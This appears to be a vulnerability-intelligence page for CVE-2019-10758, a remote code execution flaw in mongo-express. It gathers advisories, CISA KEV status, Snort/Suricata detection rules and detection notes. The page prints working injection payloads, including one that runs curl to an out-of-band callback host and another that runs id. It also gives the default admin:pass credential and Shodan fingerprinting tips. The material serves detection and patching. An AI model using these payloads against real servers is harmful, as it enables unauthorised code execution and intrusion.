CVE-2019-10758
published 2019-12-24CVE-2019-10758: mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that uses the `toBSON` method. A misuse of the `vm` dependency to perform…
PriorityP193critical9.9CVSS 3.1
AVNACLPRLUINSCCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-06-10
Exploited in the wild
EPSS
84.84%
99.7th percentile
mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that uses the `toBSON` method. A misuse of the `vm` dependency to perform `exec` commands in a non-safe environment.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mongo-express_project | mongo-express | < 0.54.0 | 0.54.0 |
| mongo-express_project | mongo-express | — | — |
| mongo-express_project | mongo-express | >= 0 < 0.54.0 | 0.54.0 |
Detection & IOCsextracted from sources · hover to see the quote
commanddocument=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl {{interactsh-url}}")↗
commanddocument=this.constructor.constructor("return pr")().mainModule.require("child_process").execSync("id")↗
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Mongo-Express RCE Inbound (CVE-2019-10758)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/checkValid"; http.request_body; content:"document=this.constructor"; content:"execSync"; distance:0; fast_pattern; reference:cve,2019-10758; reference:url,github.com/masahiro331/CVE-2019-10758; reference:url,blogs.juniper.net/en-us/threat-research/sysrv-botnet-expands-and-gains-persistence; classtype:attempted-admin; sid:2033113; rev:1; metadata:attack_target Client_Endpoint, created_at 2021_06_08, cve CVE_2019_10758, deployment Perimeter, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_06_08;)
- →Exploit targets the POST /checkValid endpoint; detect POST requests to this URI path on mongo-express instances. ↗
- →Payload body contains the string 'document=this.constructor' combined with 'execSync' — both must be present in the POST body to indicate exploitation. ↗
- →Shodan/FOFA fingerprinting: mongo-express instances are identifiable by HTTP title 'Mongo Express' or 'mongo express', commonly exposed on port 8081. ↗
- →The default Basic Auth header 'YWRtaW46cGFzcw==' (admin:pass) is used in exploit attempts against mongo-express; alert on this credential in Authorization headers to /checkValid. ↗
- →The vulnerability is exploited via the toBSON method misusing the vm dependency; look for child_process.execSync calls originating from mongo-express process. ↗
- ·Vulnerable versions are mongo-express before 0.54.0 only; instances running 0.54.0 or higher are not affected. ↗
- ·The Emerging Threats Snort rule (sid:2033113) is tagged with confidence Medium and deployment Perimeter — tune accordingly for internal/containerized mongo-express deployments. ↗
CVSS provenance
nvdv3.19.9CRITICALCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
ghsa9.9CRITICAL
osv9.9CRITICAL
vulncheck9.9CRITICAL
cisa9.9CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Remote Code Execution Vulnerability in NPM mongo-express
osv·2019-12-30·CVSS 9.9
CVE-2019-10758 [CRITICAL] Remote Code Execution Vulnerability in NPM mongo-express
Remote Code Execution Vulnerability in NPM mongo-express
### Impact
Remote code execution on the host machine by any authenticated user.
### Proof Of Concept
Launching mongo-express on a Mac, pasting the following into the "create index" field will pop open the Mac calculator:
```javascript
this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')
```
### Patches
Users should upgrade to version `0.54.0`
### Workarounds
_Is there a way for users to fix or remediate the vulnerability without upgrading?_
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [example link to repo](http://example.com)
* Email us at [example email address](mailto:
GHSA
Remote Code Execution Vulnerability in NPM mongo-express
ghsa·2019-12-30·CVSS 9.9
CVE-2019-10758 [CRITICAL] CWE-78 Remote Code Execution Vulnerability in NPM mongo-express
Remote Code Execution Vulnerability in NPM mongo-express
### Impact
Remote code execution on the host machine by any authenticated user.
### Proof Of Concept
Launching mongo-express on a Mac, pasting the following into the "create index" field will pop open the Mac calculator:
```javascript
this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')
```
### Patches
Users should upgrade to version `0.54.0`
### Workarounds
_Is there a way for users to fix or remediate the vulnerability without upgrading?_
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [example link to repo](http://example.com)
* Email us at [example email address](mailto:
VulnCheck
MongoDB mongo-express Remote Code Execution Vulnerability
vulncheck·2019·CVSS 9.9
CVE-2019-10758 [CRITICAL] MongoDB mongo-express Remote Code Execution Vulnerability
MongoDB mongo-express Remote Code Execution Vulnerability
mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that uses the `toBSON` method.
Affected: MongoDB mongo-express
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.bleepingcomputer.com/news/security/reverse-shell-botnet-gitpaste-12-spreads-via-github-and-pastebin/#google_vignette; https://blogs.juniper.net/en-us/threat-research/everything-but-the-kitchen-sink-more-attacks-from-the-gitpaste-12-worm; https://blogs.juniper.net/en-us/threat-research/sysrv-botnet-expands-and-gains-persistence; https://www.bleepingcomputer.com/news/security/new-cryptomining-malware-builds-an-army-of-windows-linux-bots/; https://cujo.com/the-sysrv-botnet-and-how-it-evolved/; https
CISA
MongoDB mongo-express Remote Code Execution Vulnerability
cisa·2021-12-10·CVSS 9.9
CVE-2019-10758 [CRITICAL] MongoDB mongo-express Remote Code Execution Vulnerability
Vulnerability: MongoDB mongo-express Remote Code Execution Vulnerability
Affected: MongoDB mongo-express
mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that uses the `toBSON` method.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2019-10758
Remediation Due Date: 2022-06-10
Suricata
ET EXPLOIT Mongo-Express RCE Inbound (CVE-2019-10758)
suricata·2021-06-08·CVSS 9.9
CVE-2019-10758 [CRITICAL] ET EXPLOIT Mongo-Express RCE Inbound (CVE-2019-10758)
ET EXPLOIT Mongo-Express RCE Inbound (CVE-2019-10758)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Mongo-Express RCE Inbound (CVE-2019-10758)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/checkValid"; http.request_body; content:"document=this.constructor"; content:"execSync"; distance:0; fast_pattern; reference:cve,2019-10758; reference:url,github.com/masahiro331/CVE-2019-10758; reference:url,blogs.juniper.net/en-us/threat-research/sysrv-botnet-expands-and-gains-persistence; classtype:attempted-admin; sid:2033113; rev:1; metadata:attack_target Client_Endpoint, created_at 2021_06_08, cve CVE_2019_10758, deployment Perimeter, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus
Nuclei
mongo-express Remote Code Execution
nuclei·CVSS 9.9
CVE-2019-10758 [CRITICAL] mongo-express Remote Code Execution
mongo-express Remote Code Execution
mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment.
Template:
id: CVE-2019-10758
info:
name: mongo-express Remote Code Execution
author: princechaddha
severity: critical
description: mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: Upgrade mongo-express to version 0.54.0 or higher.
reference:
- https://github.com/vulhub/vulh
Bleepingcomputer
MongoDB warns admins to patch severe vulnerability immediately
blogs_bleepingcomputer·2025-12-24·CVSS 9.9
CVE-2025-14847 [CRITICAL] MongoDB warns admins to patch severe vulnerability immediately
## MongoDB warns admins to patch severe vulnerability immediately
## Sergiu Gatlan
Update 12/26/25: Article updated to correct that the flaw has not been officially classified as an RCE.
MongoDB has warned IT admins to immediately patch a high-severity memory-read vulnerability that may be exploited by unauthenticated attackers remotely.
Tracked as CVE-2025-14847 , the security flaw affects multiple MongoDB and MongoDB Server versions and may be abused by unauthenticated threat actors in low-complexity attacks that don't require user interaction.
"An client-side exploit of the Server's zlib implementation can return uninitialized heap memory without authenticating to the server. We strongly recommend upgrading to a fixed version as soon as possible," MongoDB's security team said in a
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
CTF
tryhackme-rooms / rocket
ctf_writeups·CVSS 9.8
[CRITICAL] tryhackme-rooms / rocket
# Rocket
https://tryhackme.com/room/rocket
Rated: HARD
This room is a quest, and has many steps before you find the first flag. In fact, the two flags are the final steps of this room, after a lot of work haha.
1. A scan reveals port 22 and 80. On 80 you are redirected to 'rocket.thm', which is a brochureware site. A bit of investigation reveals this to be built with Bolt CMS, which becomes important (much) later.
2. Enumerating sub-domains using ffuf, you can quickly find 'chat.rocket.thm', running an instance of rocket chat. There are a few CVEs for this, in particular CVE-2021-22911 which allows using a nosql injection to recover a password reset token. There is an exploit for this here https://www.exploit-db.com/exploits/49960, however it is slow as hell and requires a few modifica
2019-12-24
Published
2021-12-10
Added to CISA KEV
Exploited in the wild